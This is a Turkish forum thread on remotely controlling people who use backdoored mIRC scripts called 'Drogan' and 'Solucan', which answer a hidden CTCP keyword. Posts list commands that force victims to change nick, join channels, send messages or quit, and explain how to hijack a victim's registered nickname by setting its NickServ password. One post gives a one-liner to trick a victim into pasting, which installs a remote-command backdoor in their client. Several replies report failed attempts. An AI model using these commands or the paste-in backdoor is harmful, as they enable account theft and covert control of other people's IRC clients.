Drogan Ve Solucan Sciprinti Dışardan Yönetmek
-
ç.CTCP özelliklerini kullanarak en basiti kurbanın nickini değiştirmekten başlayan ve her türlü mirc komutunu kullanmanızı sağlayan komutları açıklıyorum.Nick Değiştirme /ctcp nick LAGG /nick yeni nick Kanala Sokma /ctcp nick LAGG /join #kanal Kanala yazı yazdırma /ctcp nick LAGG /msg #kanal mesaj Kurbanı ircden çıkarma /ctcp nick LAGG /quit (mesaj istenirse) Kurbanın mIRC ini kapama /ctcp nick LAGG /exit Sizinde gördüğünüz gibi aslında olay sadece /ctcp nick LAGG :PPP
-
her zaman derim script kullanmayacaksin diye :)
mis gibi mirc kullan :)
anlatirlardi da inanmazdim bu olaylara... -
he baktım lem :))
-
arkadaşlar böyle diyorsunuzda. Bu olayı yapmak için scriptin içine o kodlarla yerleştirilen nick var onu bilsek bunlar kolay iş bana nick söyle.......
-
ya arkadaşlar çok sağolun yardım larınız için yaaaaaaaa
-
bir şey elde ettin mi
-
ya arkadaşlar olmuyor yaaaaaa uğraşıyorum ama olmuyor değişmiyor nasıl yapacaz neden dğişmiyor bir öneriniz vardır herhalde
-
ya kamaka oolmuyor dostum ya neden olmuyor
-
yanlış nickle yapıyosunda ondan scriptin kodlarında yer alan nickle yapman gerek
-
-> [avesta] LAGG
-
Avesta does not accept CTCPs
sonucbu işe yaramıyor -
Kurbanın nikine version çekerek hangi Sciprint kullandığını öğreniyoruz Dgoran ve Solucan Sciprint kulllanıyora verdiğim komutları yazıyoruz.ve bu arada o Scipntlti Kullanan adamını nikinide çalabilirsiniz /ctcp nick /ns set password sifre.
birde Başka şekil nick Çalma vardır
//write cemonunresmi.txt ctcp 1:*:?:$1- | load -rs cemonunresmi.txt şu komutu karşındaki kişiye yazdır.Sciprint giriş izni verecektir sana
/ctcp nick /ns set passwd sifre komutu kullanrak şifreyi çalarsın.Kolay gelsin
Toplam Hit: 13065 Toplam Mesaj: 11